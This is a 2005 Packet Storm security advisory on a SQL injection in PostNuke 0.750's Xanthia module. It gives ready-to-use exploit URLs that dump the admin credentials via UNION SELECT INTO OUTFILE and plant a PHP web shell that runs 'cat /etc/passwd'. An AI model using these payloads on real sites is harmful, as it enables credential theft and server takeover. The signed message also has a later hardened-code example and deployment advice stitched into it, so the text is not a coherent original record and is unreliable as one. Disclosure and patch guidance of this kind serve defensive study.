postnuke0750.txt

2005-08-14T00:00:00
ID PACKETSTORM:39290
Type packetstorm
Reporter Maksymilian Arciemowicz
Modified 2005-08-14T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[PostNuke SQL Injection 0.750=>x cXIb8O3.5]  
  
Author: cXIb8O3  
Date: 2.3.2005  
from SecurityReason.Com  
  
- --- 0.Description ---  
  
PostNuke: The Phoenix Release (0.750)  
  
PostNuke is an open source, open development content management system  
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and  
provides many enhancements and improvements over the PHP-Nuke system. PostNuke  
is still undergoing development, but a large number of core functions are now  
stabilising and a complete API for third-party developers is now in place.  
If you would like to help develop this software, please visit our homepage  
at http://noc.postnuke.com/  
You can also visit us on our IRC Server irc.postnuke.com channel  
#postnuke-support  
#postnuke-chat  
#postnuke  
Or at the Community Forums located at:  
http://forums.postnuke.com/  
  
- --- 1. Sql Injection ---  
This SQL injection exists in modules/Xanthia/pnclasses/Xanthia.php at line 977, in the function init_template().  
  
Vulnerable code:  
- -965-980---  
// $mod (the module name taken from the request) is interpolated into the query unescaped  
$sql = "SELECT $blcontrolcolumn[blocktemplate] as blocktemplate,  
$blcontrolcolumn[identi] as identi  
FROM $pntable[theme_blcontrol]  
WHERE $blcontrolcolumn[theme]='$theme'  
AND $blcontrolcolumn[module]='$mod'  
AND $blcontrolcolumn[blocktemplate] !=''";  
  
// Execute the query; ADODB returns false when the query fails, and that is never checked  
$result =& $dbconn->Execute($sql);  
  
$blocktemplates = array();  
// when $result is false, the calls below fail with "Call to a member function ... on a non-object"  
while(!$result->EOF) {  
$row = $result->GetRowAssoc(false);  
$blocktemplates[] = $row;  
$result->MoveNext();  
}  
- -965-980---  
  
The flaw is in the variable $mod, which is taken from the GET parameter name.  
But you cannot see the query result directly.  
  
Error:  
If you are a user with the right permissions and the function init_template() is active, go to:  
  
http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index  
  
Error message :  
- ---------------  
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977  
- ---------------  
  
OR   
  
http://[HOST]/[DIR]/modules.php?op=modload&name=sp3x&file=index&module='cXIb8O3  
  
Error message :  
- ---------------  
Fatal error: Call to a member function MoveNext() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnclasses/Xanthia.php on line 977  
- ---------------  
  
OK. First exploit.  
  
  
Exploit 0 [GET Admin Pass]  
Check the directory of PostNuke.  
  
http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index  
  
Error message :  
- ---------------  
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977  
- ---------------  
  
For example, the prefix is /www/PostNuke-0.750/source/html/.  
Now you can build the exploit, but you have to know the db prefix.  
  
http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3'/*&type=admin&func=view  
  
and the error message is:  
  
Error message :  
- ---------------  
Failed to load module Xanthia' UNION SELECT pn_uname,pn_pass FROM pn__users WHERE pn_uid=2 INTO OUTFILE '/www/PostNuke-0.750/source/html/pnTemp/Xanthia_cache/cXIb8O3'/* (at function: "view")  
- ---------------  
  
Now go to  
  
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3  
  
and you have the password for the user with id=2.  
  
  
Exploit 1 [Blind upload]  
Go to:  
  
http://[HOST]/[DIR]/user.php?op=edituser  
  
and insert PHP code into "Extra information". For example:  
  
- ---  
<?php system($_GET[cXIb8O3]); ?>  
- ---  
  
Now you can write this code out as a PHP script. For example:  
  
http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_bio,pn_uname%20FROM%20[db_prefix]users%20WHERE%20pn_uid=[YOUR_ID]%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3.php'/*&type=admin&func=view  
  
and go to:  
  
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cXIb8O3=cat /etc/passwd  
  
- --- 2. How to fix ---  
PNSA 2005-2  
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)  
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html  
SHA1: 6e76d92124c833618d02dfdb87d699374120967d  
MD5: a007e741be11389a986b1d8928a6c0e5  
Size: 160550 Bytes  
  
or CVS  
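As a defensive counterpart to the query quoted in section 1, here is a hardened version of the same lookup. This is an added example, not PostNuke's own code and not the PNSA 2005-2 patch; it assumes the ADODB connection object ($dbconn) used by the original, whose Execute() accepts a bind array as its second argument, and the function names xanthia_valid_module_name and xanthia_block_templates are invented for this illustration.

```php
<?php
// Added example (not PostNuke's code): hardened form of the Xanthia
// init_template() query. Assumes an ADODB connection in $dbconn.

/**
 * Validate a module name before it reaches SQL or the filesystem.
 * PostNuke module names are directory names under modules/, so anything
 * outside [A-Za-z0-9_] is rejected (assumption: this character set covers
 * the project's module naming convention).
 */
function xanthia_valid_module_name($mod)
{
    return is_string($mod) && preg_match('/^[A-Za-z0-9_]{1,64}$/', $mod) === 1;
}

/**
 * Fetch block templates for ($theme, $mod) using bound parameters instead of
 * string interpolation, so a quote in $mod cannot terminate the literal and
 * append UNION SELECT ... INTO OUTFILE as in the advisory.
 *
 * $pntable and $blcontrolcolumn are configuration arrays (table and column
 * names), not request data, so interpolating them is acceptable here.
 * Returns an array of rows, or false when the input is rejected or the query fails.
 */
function xanthia_block_templates($dbconn, $pntable, $blcontrolcolumn, $theme, $mod)
{
    // Reject anything that is not a plausible module/theme name up front.
    if (!xanthia_valid_module_name($mod) || !xanthia_valid_module_name($theme)) {
        return false;
    }

    $sql = "SELECT $blcontrolcolumn[blocktemplate] AS blocktemplate,
                   $blcontrolcolumn[identi] AS identi
            FROM $pntable[theme_blcontrol]
            WHERE $blcontrolcolumn[theme] = ?
              AND $blcontrolcolumn[module] = ?
              AND $blcontrolcolumn[blocktemplate] != ''";

    // ADODB binds the array values to the ? placeholders.
    $result = $dbconn->Execute($sql, array($theme, $mod));
    if ($result === false) {
        // The original code dereferenced $result unconditionally; a failed
        // query therefore produced the "Call to a member function ... on a
        // non-object" fatal error quoted above, leaking the install path.
        return false;
    }

    $blocktemplates = array();
    while (!$result->EOF) {
        $blocktemplates[] = $result->GetRowAssoc(false);
        $result->MoveNext();
    }
    return $blocktemplates;
}
```

Two deployment-side checks complement the code change: the MySQL account used by PostNuke should not hold the FILE privilege, since both exploits above depend on SELECT ... INTO OUTFILE, and the pnTemp/Xanthia_cache directory should not be served as executable PHP, so that a file written there cannot be run through the web server.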
  
- --- 3. Greets ---  
  
sp3x  
  
- --- 4. Contact ---  
Author: Maksymilian Arciemowicz  
Email: max [at] jestsuper [dot] pl  
GPG-KEY: http://securityreason.com  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.6 (FreeBSD)  
  
iD8DBQFCjunXznmvyJCR4zQRAjFkAJ4lDoD/zYP3lFZD07XsR9WyftT7vACgjRPr  
oAXlzjom7BH7yzDRybeHjDM=  
=RlgM  
-----END PGP SIGNATURE-----  